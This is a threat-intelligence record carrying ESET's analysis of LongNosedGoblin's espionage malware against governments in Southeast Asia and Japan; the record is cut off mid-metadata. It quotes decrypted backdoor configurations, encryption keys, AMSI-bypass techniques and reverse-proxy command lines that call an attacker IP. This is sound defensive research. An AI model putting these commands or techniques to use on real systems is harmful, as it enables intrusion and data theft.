{
	"id": "34569ebe-d76f-409e-ae03-4183d978744b",
	"created_at": "2026-04-06T00:15:07.014303Z",
	"updated_at": "2026-04-10T03:36:01.259667Z",
	"deleted_at": null,
	"sha1_hash": "89a95122b0a4d563a054163efc886c6053bff9c8",
	"title": "LongNosedGoblin tries to sniff out governmental affairs in Southeast Asia and Japan",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 648272,
	"plain_text": "LongNosedGoblin tries to sniff out governmental affairs in\r\nSoutheast Asia and Japan\r\nBy Anton Cherepanov and Peter Strýček\r\nArchived: 2026-04-05 19:10:41 UTC\r\nIn 2024, ESET researchers noticed previously undocumented malware in the network of a Southeast Asian\r\ngovernmental entity. This led us to uncover even more new malware on the same system, none of which had\r\nsubstantial ties to any previously tracked threat actors. Based on our findings, we decided to attribute the\r\nmalicious tools to a new China-aligned APT group that we have named LongNosedGoblin.\r\nThe group employs a varied custom toolset consisting mainly of C#/.NET applications, and, notably, uses Group\r\nPolicy to deploy its malware and move laterally across the systems of targeted entities. This blogpost details our\r\ndiscovery of LongNosedGoblin, goes over its known campaigns, and dives into the toolset of the group.\r\nKey points of the report:\r\nLongNosedGoblin is a newly discovered China-aligned APT group targeting governmental\r\nentities in Southeast Asia and Japan, with the goal of cyberespionage.\r\nThe group has been active since at least September 2023.\r\nLongNosedGoblin uses Group Policy to deploy malware across the compromised network, and\r\ncloud services (e.g., Microsoft OneDrive and Google Drive) as command and control (C\u0026C)\r\nservers.\r\nOne of the group’s tools, NosyHistorian, is used to gather browser history and decide where to\r\ndeploy further malware, such as the NosyDoor backdoor.\r\nNosyDoor is most likely being shared by multiple China-aligned threat actors.\r\nWe provide a detailed analysis of NosyHistorian, NosyDoor, NosyStealer, NosyDownloader,\r\nNosyLogger, and other tools used by LongNosedGoblin.\r\nSmells like trouble: Introducing LongNosedGoblin\r\nLongNosedGoblin is a China-aligned APT group that targets governmental entities in Southeast Asia and Japan,\r\nwith the goal of conducting cyberespionage. 
As we already mentioned: in its campaigns, LongNosedGoblin\r\nabuses Group Policy – a mechanism for managing settings and permissions on Windows machines, typically used\r\nwith Active Directory – to deploy malware and move laterally across the compromised network.\r\nOne of the main tools in its arsenal is NosyHistorian, a C#/.NET application that the group uses to collect browser\r\nhistory, which is then used to determine where to deploy further malware. This includes another major\r\nLongNosedGoblin tool, a backdoor that we named NosyDoor, which, in campaigns we observed, used Microsoft\r\nOneDrive as its C\u0026C server. NosyDoor also employs living-off-the-land techniques in its execution chain, namely\r\nAppDomainManager injection. Finally, several of the group’s tools can bypass the Antimalware Scan Interface\r\n(AMSI), which enables antimalware products to scan various scripts before execution.\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 1 of 19\n\nDiscovery\r\nIn February 2024, we found unknown malware on a system of a governmental entity in Southeast Asia. The\r\nmalware was used to drop a custom backdoor, which we later named NosyDoor. At the same time, we noticed that\r\nthe compromise involved not just one, but multiple machines from the same entity, with the malware having been\r\ndeployed via Group Policy.\r\nAdditional analysis revealed that the same victims were also afflicted with a different malicious tool distributed\r\nvia Group Policy, this one used for collecting browser history. We named the tool NosyHistorian. While we found\r\nmany victims affected by NosyHistorian in the course of our original investigation between January and March\r\n2024, only a small subset of them were compromised by NosyDoor. 
Some samples of NosyDoor’s dropper even\r\ncontained execution guardrails to limit operation to specific victims’ machines.\r\nLater, we identified even more unknown malware on the victims’ machines: NosyStealer, which exfiltrates\r\nbrowser data; NosyDownloader, which downloads and runs a payload in memory; NosyLogger, a keylogger; other\r\ntools like a reverse SOCKS5 proxy; and an argument runner (a tool that runs an application passed as an\r\nargument) that was used to run a video recorder, likely FFmpeg, to capture audio and video. The downloader was\r\nfirst recorded in our telemetry as far back as September 2023.\r\nAttribution\r\nDue to the unique toolset, alongside the use of Group Policy for lateral movement, we decided to attribute the\r\nattacks to a new China-aligned APT group, and named it LongNosedGoblin. We noticed some overlap in the file\r\npaths mentioned in a Kaspersky blogpost about ToddyCat activity, an APT group with similar targeting, but the\r\nmalware in that report lacks code similarity with the malware considered here.\r\nIt should also be noted that in June 2025, the Russian cybersecurity company Solar published a blogpost on an\r\nAPT group it refers to as Erudite Mogwai, which used a payload that closely resembles LongNosedGoblin’s\r\nNosyDoor. According to the authors, Erudite Mogwai targeted the IT infrastructure of a Russian government\r\norganization and Russian IT companies, using the LuckyStrike Agent backdoor in its operations.\r\nHowever, we cannot confirm that Erudite Mogwai and LongNosedGoblin are one and the same, as there is a\r\ndefinite difference in TTPs between the two groups. 
Notably, the Erudite Mogwai research does not mention the\r\nabuse of Active Directory Group Policy for malware deployment – a technique that is quite specific to\r\nLongNosedGoblin’s operations.\r\nWe later identified another instance of a NosyDoor variant targeting an organization in an EU country, once again\r\nemploying different TTPs, and using the Yandex Disk cloud service as a C\u0026C server. The use of this NosyDoor\r\nvariant suggests that the malware may be shared among multiple China-aligned threat groups. This is further\r\ncorroborated by Solar’s observation of the word Paid in the PDB path of NosyDoor, suggesting that the malware\r\nmay be commercially provided as a service – potentially indicating it is being sold or licensed to other threat\r\nactors.\r\nLater campaigns\r\nThroughout 2024, LongNosedGoblin was actively deploying NosyDownloader in Southeast Asia. In December of\r\nthe same year, we detected an updated version of NosyHistorian in Japan, but then observed no subsequent\r\nactivity.\r\nIn September 2025, we began seeing renewed activity of the group in Southeast Asia. As in previous campaigns,\r\nthe threat actor leveraged Group Policy to deliver NosyHistorian to targeted machines.\r\nDuring this wave of attacks, we noticed behavior consistent with Cobalt Strike usage: a loader named oci.dll was\r\ndownloaded on a single machine, with a payload named ocapi.edb loaded from disk. LongNosedGoblin then\r\ndeployed the potential Cobalt Strike loader to selected machines via Group Policy.\r\nAdditionally, we saw that another similar component, mscorsvc.dll, was downloaded, with its payload stored in\r\nconf.ini. 
This loader was then deployed to victims’ machines using Group Policy, employing the same delivery\r\nmechanism as oci.dll.\r\nNosyHistorian\r\nNosyHistorian is a C#/.NET application with a self-explanatory internal name GetBrowserHistory, as it, indeed,\r\ncollects browser history. In the observed campaigns, the attackers used this tool to gain insight about the machines\r\nin the compromised infrastructure. Based on this information, they picked a small subset of specific victims to\r\ncompromise further with their NosyDoor backdoor.\r\nWe saw the tool being deployed via Group Policy under the filename History.ini, disguising the file as an INI file.\r\nIn reality, this is a portable executable (PE) file, with the goal most likely being to blend in with other INI files\r\ncommonly stored in the Group Policy cache directory.\r\nNosyHistorian iterates over all users on the machine and retrieves the browser history from Google Chrome,\r\nMicrosoft Edge, and Mozilla Firefox. Each history database file is copied to a temporary directory and then\r\nuploaded to a specific hardcoded SMB share within the local network of the compromised organization.\r\nNosyHistorian’s filename for each web browser’s history file is listed in Table 1, where \u003cprofile_name\u003e\r\ncorresponds to web browser profiles.\r\nTable 1. 
Crafted history filenames by NosyHistorian\r\nWeb browser Filename\r\nGoogle Chrome \u003cusername\u003e_\u003cmachine_name\u003e_\u003cprofile_name\u003e_History\r\nMicrosoft Edge \u003cusername\u003e_\u003cmachine_name\u003e_edge_History\r\nMozilla Firefox \u003cusername\u003e_\u003cmachine_name\u003e_firefox_\u003cprofile_name\u003e_places.sqlite\r\nBoth this tool and NosyDoor have similar PDB paths and were compiled from the E:\\Csharp directory, with the\r\nNosyHistorian PDB path being: E:\\Csharp\\SharpMisc\\GetBrowserHistory\\obj\\Debug\\GetBrowserHistory.pdb.\r\nNosyDoor\r\nAs stated previously, the NosyDoor backdoor uses cloud services, such as Microsoft OneDrive, for its C\u0026C\r\nserver. The malware has a fairly straightforward, three-stage chain of execution, depicted in Figure 1. The first\r\nstage is a dropper that deploys the second stage, which involves a living-off-the-land attack using the\r\nAppDomainManager injection technique, which is in turn used to execute the final payload, the backdoor itself.\r\nNosyDoor collects metadata about the victim’s machine, including the machine name, username, the OS version,\r\nand the name of the current process, and sends it all to the C\u0026C. It then retrieves and parses task files with\r\ncommands from the C\u0026C. The commands allow it to exfiltrate files, delete files, and execute shell commands,\r\namong other things.\r\nFigure 1. NosyDoor execution chain\r\nNosyDoor Stage 1 – dropper\r\nThe malware’s first stage is a dropper, specifically a C#/.NET application with the internal name\r\nOneClickOperation. Like NosyHistorian, it is deployed via Group Policy. 
We have seen the dropper\r\nmasquerade as a Registry Policy file by using the filename Registry.pol, although we also observed Registry.plo,\r\nwhich is uncommon (it could be a typo, or maybe the threat actors did not want the filename to conflict with\r\nanother malicious file).\r\nThe dropper base64 decodes embedded files and decrypts them via Data Encryption Standard (DES) with both\r\nkey and initialization vector set to UevAppMo (the first eight bytes of the string UevAppMonitor), then drops\r\nthem to C:\\Windows\\Microsoft.NET\\Framework with the following filenames:\r\nSharedReg.dll\r\nlog.cached\r\nnetfxsbs9.hkf\r\nUevAppMonitor.exe.config\r\nThese filenames have been chosen deliberately to blend in with existing files, since the directory normally\r\ncontains files named SharedReg12.dll and netfxsbs12.hkf.\r\nIn its final steps, the dropper creates and starts a Windows scheduled task with the name OneDrive Reporting\r\nTask-S-1-5-21-\u003cGUID\u003e under the Microsoft task folder, where \u003cGUID\u003e is a random GUID string. The scheduled\r\ntask is responsible for executing the legitimate UevAppMonitor.exe in the\r\nC:\\Windows\\Microsoft.NET\\Framework directory during system startup. The dropper copies the legitimate file\r\nfrom C:\\Windows\\System32\\ to the new location.\r\nThe newer samples also include an execution guardrail that makes the dropper function only on victims’\r\ncomputers with a specific machine name (see Figure 2).\r\nFigure 2. Dropper code with execution guardrails\r\nNosyDoor Stage 2 – AppDomainManager injection\r\nUevAppMonitor.exe is a legitimate C#/.NET application, which the malware copied from\r\nC:\\Windows\\System32\\ to the C:\\Windows\\Microsoft.NET\\Framework directory and used as a living-off-the-land\r\nbinary, or LOLBin. 
Living-off-the-land attacks abuse legitimate tools already present on the system. In this case,\r\nthe application is used to trigger AppDomainManager injection via a configuration file. This technique can make\r\napplications built in the .NET framework load malicious code instead of the intended legitimate code by making\r\nuse of the AppDomainManager class.\r\nWhen the application is executed, it loads the configuration file shown in Figure 3, which makes the application\r\ncall the InitializeNewDomain method of the custom SharedReg class in SharedReg.dll. The configuration also sets\r\nthe \u003cetwEnable\u003e element’s enabled attribute to false so that event tracing for Windows is disabled.\r\nFigure 3. Content of UevAppMonitor.exe.config with specified AppDomainManager\r\nSharedReg.dll contains code to bypass AMSI, from an open-source AV/EDR evasion framework called inceptor.\r\nOther than that, it base64 decodes the file netfxsbs9.hkf, decrypts the result via AES with key UevAppMonitor,\r\npadded with null bytes until its length is 16, initialization vector 0, and eventually base64 decodes the result again.\r\nThe result is NosyDoor, which is then executed. Any errors are written to the file error.txt in the\r\nC:\\Windows\\Microsoft.NET\\Framework directory.\r\nNosyDoor Stage 3 – payload\r\nNosyDoor’s third stage, the main payload, is a C#/.NET backdoor with the internal name OneDrive and with PDB\r\npath E:\\Csharp\\Thomas\\Server\\ThomasOneDrive\\obj\\Release\\OneDrive.pdb. 
As this name suggests, the backdoor\r\nuses cloud services, in this case Microsoft OneDrive, as a C\u0026C server.\r\nThe full list of metadata the backdoor collects consists of the following:\r\nexternal IPv4 address,\r\nlocal IPv4 address,\r\nagent ID,\r\nusername,\r\nmachine name,\r\ncurrent directory,\r\ncurrent process (name, ID, architecture),\r\nstage 3 local start time,\r\ncurrent local time,\r\nOS version,\r\nCodeType (see Table 3), and\r\nAgentType (see Table 3).\r\nAll collected metadata is encrypted via RSA and then uploaded to OneDrive as the file Read_\u003cagent_id\u003e.max.\r\nOnce NosyDoor sends the metadata, it looks for commands from the C\u0026C in task files with .max extensions in the\r\nfollowing directory:\r\n\u003cFolderName\u003e-\u003cListenerID\u003e/\u003cagent_id\u003e/\u003cPayload.TaskFolderName\u003e\r\nEach task file contains an encrypted command, which is encapsulated with values taken from the backdoor’s\r\nconfiguration:\r\n\u003cPayload.Prepend\u003e\u003cPayload.PayloadPrepend\u003e\u003cencrypted_command\u003e\u003cPayload.PayloadAppend\u003e\r\n\u003cPayload.Append\u003e\r\nThe command is then decoded with base64 and decrypted via AES with key \u003cPayload.Key\u003e and initialization\r\nvector 0. All commands are described in Table 2. Although the command CMD_TYPE_TASKSCHEDULER is\r\nmentioned in the code, it is not implemented in any of the observed samples.\r\nTable 2. Commands supported by NosyDoor\r\nCommand Description\r\nCMD_TYPE_SHELL Execute a shell command.\r\nCMD_TYPE_EXEC_ASM Load a .NET assembly.\r\nCMD_TYPE_EXIT Quit NosyDoor.\r\nCMD_TYPE_REMOVE Delete a file and list its original directory.\r\nCMD_TYPE_DOWNLOAD\r\nExfiltrate a file. 
Note that download and upload commands are here\r\nnamed in terms of the attacker’s perspective, treating the C\u0026C\r\nmachine as the local machine and the victim machine as the remote\r\none.\r\nCMD_TYPE_UPLOAD\r\nUpload a file to the victim’s machine, delete it from OneDrive, and list\r\nthe directory where the file was uploaded.\r\nCMD_TYPE_DRIVES Get names and sizes of logical drives present on the machine.\r\nCMD_TYPE_FILE_BROWSE Obtain a directory listing, including file icons.\r\nCMD_TYPE_SLEEP Set the beaconing interval.\r\nCMD_TYPE_TASKSCHEDULER Not implemented.\r\nCMD_TYPE_Plugin Load a .NET assembly, directly calling the method Plugin.Run.\r\nAfter executing the command, NosyDoor performs the reverse steps – encrypts command output using AES,\r\nencodes with base64, and encapsulates with the strings \u003cPayload.Prepend\u003e\u003cPayload.PayloadPrepend\u003e and\r\n\u003cPayload.PayloadAppend\u003e\u003cPayload.Append\u003e. Each result is stored on the C\u0026C server in a file with a filename\r\nspecifying local time (Unix timestamp multiplied by 100,000) and ending with the .max extension:\r\n\u003cFolderName\u003e-\u003cListenerID\u003e/\u003cagent_id\u003e/\u003cPayload.ReceiveFolderName\u003e/\u003cunix_timestamp\u003e.max\r\nIf an exception occurs during NosyDoor’s operation, the backdoor writes the exception message together with the\r\nlocal time to C:\\Users\\Public\\Libraries\\thomas.log.\r\nThe backdoor contains a custom dependency named Library that is embedded as a resource by using Costura. 
It\r\nmainly contains code related to command processing, Microsoft OneDrive communication, and various helper\r\nmethods, while the main binary handles the beaconing loop and reads a config file, utilizing the library.\r\nThe configuration is stored in the file log.cached in encrypted form. NosyDoor decrypts it via XOR with key\r\nSecretKey, base64 decodes it, then decrypts it via AES with key Thomas, filled with null bytes until its length is\r\n16, and IV 0. This configuration can be seen in Figure 4.\r\n{\r\n \"ListenerID\": 3,\r\n \"FolderName\": \"Duis euismod, mi, ligula, mattis feugiat, pulvinar.\",\r\n \"AppID\": \"[redacted]\",\r\n \"RefreshToken\": \"[redacted]\",\r\n \"BaseUrl\": \"https://graph.microsoft.com/v1.0/drive\",\r\n \"TokenUrl\": \"https://login.microsoftonline.com/common/oauth2/v2.0/token\",\r\n \"CodeType\": \".NET40\",\r\n \"AgentType\": \"OneDrive\",\r\n \"Scope\": \"offline_access files.readwrite\",\r\n \"Sleep\": 66,\r\n \"BeginDate\": \"08:51:00\",\r\n \"EndDate\": \"18:51:00\",\r\n \"Payload\": {\r\n \"Key\": \"583oq23aonxloet7\",\r\n \"MetaDataName\": null,\r\n \"TaskFolderName\": \"Risus blandit mattis\",\r\n \"ReceiveFolderName\": \"Felis posuere at\",\r\n \"Prepend\": \"UBLIC \\\"-//W3C//DTD XHTML 1.0 Strict//EN\\\" \\\"http://www.w3.org/TR/xhtml1/DTD\r\n/www.w3.org/1999/xhtml\\\"\u003e\r\n\r\nborder:\",\r\n \"Append\": \";\r\n }\r\n --\u003e\r\n\r\ndiv\u003e \",\r\n \"PayloadPrepend\": \"Fames\",\r\n \"PayloadAppend\": \"Ipsum\"\r\n }\r\n}\r\nFigure 4. Decrypted configuration (log.cached, beautified)\r\nThe configuration values BeginDate and EndDate specify the local time range when NosyDoor operates. In this\r\ncase, NosyDoor is active only between 8:51 am and 6:51 pm. Once authenticated, though, NosyDoor will process\r\ncommands that are still pending in a queue and send response files regardless of what time it is.\r\nNosyStealer\r\nNosyStealer is used to steal browser data from Microsoft Edge and Google Chrome. As illustrated in Figure 5, it\r\nhas a four-stage chain of execution, with the stealer component being the final-stage payload.\r\nFigure 5. NosyStealer execution chain\r\nNosyStealer Stage 1 – DLL loader\r\nThe first stage (pmp.exe) in the NosyStealer chain is a C/C++ application. The observed sample simply loads a\r\nlibrary named SERV.dll from disk and calls the exported function Hello.\r\nNosyStealer Stage 2 – injector\r\nWe observed two NosyStealer Stage 2 samples – one (SERV.dll) in our telemetry, and the other (msi.dll) uploaded\r\nto VirusTotal from Malaysia. Neither has the exported function Hello but both have the main code in DllMain, i.e.,\r\nthe malicious code is run right after the DLL is loaded. They have the following exports:\r\n??0Cv2dllnoinject@@QEAA@XZ\r\n??4Cv2dllnoinject@@QEAAAEAV0@$$QEAV0@@Z\r\n??4Cv2dllnoinject@@QEAAAEAV0@AEBV0@@Z\r\n?fnv2dllnoinject@@YAHXZ\r\n?nv2dllnoinject@@3HA\r\nThe next-stage data is loaded from the hardcoded path C:\\ProgramData\\Microsoft\\WDF\\MDE.dat. It is decrypted\r\nvia a single-byte XOR cipher with key 0x7A. The result is Donut shellcode that is injected into the running\r\npmp.exe process (NosyStealer Stage 1) using the CreateRemoteThread API in the SERV.dll case, and into a newly\r\ncreated notepad.exe process using the SetThreadContext API in the msi.dll case.\r\nNosyStealer Stage 3 – loader\r\nAs mentioned in the NosyStealer Stage 2 – injector section, this stage is shellcode containing an embedded PE file\r\nthat is decrypted, loaded, and executed in memory using Donut’s reflective loader. The extracted binary is a\r\nC/C++ application.\r\nLike NosyDoor Stage 2 – AppDomainManager injection, this stage uses a known technique to bypass AMSI. It\r\npatches the AmsiScanBuffer function in the loaded amsi.dll with code that returns E_INVALIDARG (see\r\nFigure 6).\r\nFigure 6. 
Hex-Rays decompiled code that patches AmsiScanBuffer\r\nThen it creates a Windows scheduled task with the name Daily Check Task that runs\r\nC:\\ProgramData\\Microsoft\\WDF\\pmp.exe (NosyStealer Stage 1) every day with permissions of the local system\r\naccount.\r\nAfter patching the AMSI function and persisting, it continues similarly to the previous stage – it decrypts the next\r\nstage from the hardcoded path C:\\ProgramData\\Microsoft\\WDF\\mfd.dat via a single-byte XOR cipher with key\r\n0x7A, where the resulting blob is another Donut shellcode, which is then executed.\r\nNosyStealer Stage 4 – payload\r\nAgain, like NosyStealer Stage 3 – loader, this stage is shellcode that decrypts, loads, and executes an embedded\r\nPE file in memory using Donut’s reflective loader. This time, the extracted binary is a Go application that steals\r\nbrowser data from the Microsoft Edge and Google Chrome web browsers. To do so, it downloads a file named\r\nconfig from Google Docs. When the file contains a victim’s ID, NosyStealer reads Microsoft Edge and Google\r\nChrome profile data, archives it with tar, and encrypts it with a custom cipher.\r\nNosyStealer then exfiltrates the encrypted tar archive to Google Drive. 
Figure 7 is an example of the JSON-formatted configuration, embedded in the binary, required to access Google Drive and Google Docs.\r\n{\r\n \"type\": \"service_account\",\r\n \"project_id\": \"dev0-411506\",\r\n \"private_key_id\": \"[redacted]\",\r\n \"private_key\": \"[redacted]\",\r\n \"client_email\": \"dev0-660@dev0-411506.iam.gserviceaccount.com\",\r\n \"client_id\": \"[redacted]\",\r\n \"auth_uri\": \"https://accounts.google.com/o/oauth2/auth\",\r\n \"token_uri\": \"https://oauth2.googleapis.com/token\",\r\n \"auth_provider_x509_cert_url\": \"https://www.googleapis.com/oauth2/v1/certs\",\r\n \"client_x509_cert_url\":\r\n\"https://www.googleapis.com/robot/v1/metadata/x509/dev0-660%40dev0-411506.iam.gserviceaccount.com\",\r\n \"universe_domain\": \"googleapis.com\"\r\n}\r\nFigure 7. NosyStealer configuration\r\nNosyStealer also records errors and status messages to a Google Docs file named log, which may include\r\ninformation from more than one victim. The status message includes the constant 9, possibly an indication of the\r\nNosyStealer version. The full status message format, where \u003cmachine_local_ips\u003e represents a list of local IPv4\r\naddresses of network adapters, is as follows:\r\n\u003clocal_date\u003e - \u003cvictim_id\u003e - 9 - heartbeat \u003cmachine_local_ips\u003e\r\nNosyDownloader\r\nAnalyzing ESET telemetry data, we also found in the networks compromised by LongNosedGoblin various\r\noriginally benign applications that had been patched with malicious code. This code contains a downloader that\r\nwe named NosyDownloader, which executes a chain of obfuscated commands passed to a spawned PowerShell\r\nprocess as one long command line argument, meaning that the script is not stored on disk. Every subsequent stage\r\nis encoded with base64, where the last one is additionally deflated with gzip.\r\nEach stage is briefly described in Table 3. Like NosyDoor Stage 2 and NosyStealer Stage 3, the second stage here\r\nalso bypasses AMSI. 
In this case, NosyDownloader uses Matt Graeber’s reflection method and disabling script\r\nlogging techniques made available on GitHub to bypass AMSI.\r\nTable 3. NosyDownloader script stages\r\nStage Description\r\n1 Decodes and executes Stage 2 in a newly created PowerShell process that runs in a hidden window.\r\n2 Bypasses AMSI, then decodes and executes Stage 3.\r\n3 Decodes, decompresses, and executes Stage 4.\r\n4 Downloads a payload and executes it in memory with Invoke-Expression.\r\nWe suspect that NosyDownloader was used to deploy ReverseSocks5, NosyLogger, and an argument runner, as\r\nwe saw them in the span of one week after NosyDownloader was executed.\r\nNosyLogger\r\nWe also identified a C#/.NET keylogger that we named NosyLogger. It seems to be a modified version of the\r\nopen-source keylogger DuckSharp, with the main differences being that it doesn’t send emails or translate logged\r\nkeys into the Cyrillic alphabet.\r\nThe malware initially checks whether a debugger is present via the IsDebuggerPresent and\r\nCheckRemoteDebuggerPresent APIs; if not, it begins its keylogging functionality.\r\nWindow name, pressed keys, and pasted clipboard content are accumulated in memory. NosyLogger encrypts\r\nthese data batches using AES with the key\r\nD53FCC01038E20193FBD51B7400075CF7C9C4402B73DA7B0DB836B000EBD8B1C and a randomly\r\ngenerated initialization vector of fixed length, where the vector is appended to the encrypted batch of data. The\r\nencrypted data batch is then appended to the file at the hardcoded location C:\\Windows\\Temp\\TS_D418.tmp in\r\nhexadecimal string format. In that file, each encrypted data batch is separated by a newline followed by the string\r\nENDBLOCK. 
This process of encrypting and storing accumulated data to the file takes place every 10 seconds.\r\nThis file is not exfiltrated by NosyLogger.\r\nOther deployed tools\r\nReverseSocks5\r\nAmong other malware deployed by LongNosedGoblin, we found an open-source reverse SOCKS5 proxy, written\r\nin Go, called ReverseSocks5. We discovered it when we noticed the following command line arguments being\r\nused:\r\n-connect 118.107.234[.]29:8080 -psk \"58fi04qQ\" /F\r\nThe option -psk is used to set a preshared key for encryption and authentication. The argument /F is not handled\r\nby ReverseSocks5 and is probably unintentional; this argument is commonly used with schtasks create.\r\nWe then noticed another set of command line arguments (which do not have the /F argument anymore):\r\n-connect 118.107.234[.]29:8080 -psk \"15Kaf22N3b\"\r\nThis second set corresponds to execution of ReverseSocks5, where we observed PowerShell as the parent process.\r\nNosyDownloader was also executed during this time, indicating that the sample was probably deployed with it.\r\nArgument runner\r\nThis is a C#/.NET application with internal name Binary; the sole purpose of this tool is to run an application\r\npassed as an argument. We saw the filename TCOEdge.exe as part of the command line along with arguments that\r\nare specific to the FFmpeg multimedia framework; it was used to record the screen and capture audio, saving it to\r\nC:\\Windows\\Temp\\output.avi.\r\nConclusion\r\nLongNosedGoblin is a China-aligned APT group that targets governmental entities in Southeast Asia and Japan.\r\nOur analysis of its campaigns revealed numerous pieces of custom malware, which the group uses to conduct\r\ncyberespionage against its victims. 
Notably, LongNosedGoblin employs Group Policy to perform lateral\r\nmovement within the compromised network.\r\nFor any inquiries about our research published on WeLiveSecurity, please contact us at\r\nthreatintel@eset.com.\r\nESET Research offers private APT intelligence reports and data feeds. For any inquiries about this\r\nservice, visit the ESET Threat Intelligence page.\r\nIoCs\r\nA comprehensive list of indicators of compromise (IoCs) and samples can be found in our GitHub repository.\r\nMITRE ATT\u0026CK techniques\r\nThis table was built using version 18 of the MITRE ATT\u0026CK framework.\r\nTactic ID Name Description\r\nResource Development T1585.003 Establish Accounts: Cloud Accounts LongNosedGoblin created accounts on cloud-based services for C\u0026C communication.\r\nResource Development T1588.001 Obtain Capabilities: Malware LongNosedGoblin likely used shared malware that we named NosyDoor.\r\nExecution T1059.001 Command and Scripting Interpreter: PowerShell NosyDownloader executes PowerShell commands.\r\nExecution T1059.003 Command and Scripting Interpreter: Windows Command Shell NosyDoor may execute commands via cmd.exe.\r\nExecution T1106 Native API NosyStealer Stage 1 executes the next stage via the LoadLibraryW API.\r\nPersistence T1053.005 Scheduled Task/Job: Scheduled Task NosyDoor and NosyStealer are persisted using Windows scheduled tasks.\r\nPersistence T1574.014 Hijack Execution Flow: AppDomainManager NosyDoor Stage 2 uses AppDomainManager injection to run malicious code.\r\nDefense Evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File Malicious files embedded in NosyDoor Stage 1 are encrypted via DES.\r\nDefense Evasion T1027.015 Obfuscated Files or Information: Compression NosyDownloader Stage 4 is compressed using gzip.\r\nDefense Evasion T1622 Debugger Evasion NosyLogger does not operate if a debugger is present.\r\nDefense Evasion T1480 Execution Guardrails Some samples of NosyDoor operate only on machines with specific names.\r\nDefense Evasion T1564.003 Hide Artifacts: Hidden Window NosyDownloader creates a PowerShell process with a hidden window.\r\nDefense Evasion T1562.001 Impair Defenses: Disable or Modify Tools NosyDoor Stage 2, NosyStealer Stage 3, and NosyDownloader bypass AMSI.\r\nDefense Evasion T1036.005 Masquerading: Match Legitimate Name or Location NosyHistorian Stage 1 was observed with the name Registry.pol, masquerading as a Registry Policy file.\r\nDefense Evasion T1218 Signed Binary 
Proxy\r\nExecution\r\nNosyDoor Stage 1 executes the next stage by\r\nleveraging the legitimate\r\nUevAppMonitor.exe.\r\nT1055 Process Injection\r\nOne observed NosyStealer Stage 2 injects\r\nStage 3 to pmp.exe via CreateRemoteThread.\r\nThe other observed sample injects to\r\nnotepad.exe via SetThreadContext with\r\nResumeThread.\r\nT1620 Reflective Code Loading\r\nDonut has been used to execute NosyStealer\r\nStage 3 and Stage 4 in memory.\r\nDiscovery\r\nT1217\r\nBrowser Information\r\nDiscovery\r\nNosyHistorian collects browser history from\r\nGoogle Chrome, Microsoft Edge, and\r\nMozilla Firefox.\r\nT1083\r\nFile and Directory\r\nDiscovery\r\nNosyDoor can list files and directories.\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 17 of 19\n\nTactic ID Name Description\r\nT1082\r\nSystem Information\r\nDiscovery\r\nNosyDoor obtains system information as part\r\nof C\u0026C beaconing.\r\nCollection\r\nT1056.001 Input Capture: Keylogging NosyLogger logs keystrokes.\r\nT1125 Video Capture\r\nLongNosedGoblin has used video recording\r\nsoftware, likely FFmpeg, to capture audio\r\nand video.\r\nT1560 Archive Collected Data NosyLogger encrypts collected data via AES.\r\nT1074.001\r\nData Staged: Local Data\r\nStaging\r\nNosyLogger stores pressed keys, window\r\nnames, and clipboard content to a file at a\r\nhardcoded path.\r\nCommand\r\nand Control\r\nT1071.001\r\nApplication Layer\r\nProtocol: Web Protocols\r\nNosyDownloader uses HTTP to download\r\nfurther payload.\r\nT1105 Ingress Tool Transfer\r\nNosyDoor and NosyDownloader can\r\ndownload and run subsequent payloads.\r\nT1102.002\r\nWeb Service: Bidirectional\r\nCommunication\r\nNosyDoor uses Microsoft OneDrive as its\r\nC\u0026C server. 
NosyStealer uses Google Docs\r\nto receive a trigger command and to send\r\ndebug messages, and Google Drive to\r\nexfiltrate browser data.\r\nT1573.001\r\nEncrypted Channel:\r\nSymmetric Cryptography\r\nNosyDoor encrypts C\u0026C command outputs\r\nvia AES.\r\nT1573.002\r\nEncrypted Channel:\r\nAsymmetric Cryptography\r\nNosyDoor uses RSA to encrypt metadata that\r\nis sent to the C\u0026C server.\r\nExfiltration T1567.002\r\nExfiltration Over Web\r\nService: Exfiltration to\r\nCloud Storage\r\nNosyStealer exfiltrates browser data to\r\nGoogle Drive.\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 18 of 19\n\nSource: https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nhttps://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/\r\nPage 19 of 19",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.welivesecurity.com/en/eset-research/longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan/"
	],
	"report_names": [
		"longnosedgoblin-tries-sniff-out-governmental-affairs-southeast-asia-japan"
	],
	"threat_actors": [
		{
			"id": "d67df52c-a901-4d55-b287-321818500789",
			"created_at": "2024-04-24T02:00:49.591518Z",
			"updated_at": "2026-04-10T02:00:05.314272Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"ToddyCat"
			],
			"source_name": "MITRE:ToddyCat",
			"tools": [
				"Cobalt Strike",
				"LoFiSe",
				"China Chopper",
				"netstat",
				"Pcexter",
				"Samurai"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "4c4e1108-8c11-48e3-91e3-95c24042f3a5",
			"created_at": "2022-10-25T16:07:24.329539Z",
			"updated_at": "2026-04-10T02:00:04.939013Z",
			"deleted_at": null,
			"main_name": "ToddyCat",
			"aliases": [
				"Operation Stayin’ Alive",
				"Storm-0247"
			],
			"source_name": "ETDA:ToddyCat",
			"tools": [
				"CHINACHOPPER",
				"China Chopper",
				"Cuthead",
				"FRP",
				"Fast Reverse Proxy",
				"Impacket",
				"Krong",
				"LoFiSe",
				"Ngrok",
				"PcExter",
				"PsExec",
				"SIMPOBOXSPY",
				"Samurai",
				"SinoChopper",
				"SoftEther VPN",
				"TomBerBil",
				"WAExp"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "60d96824-1767-4b97-a6c7-7e9527458007",
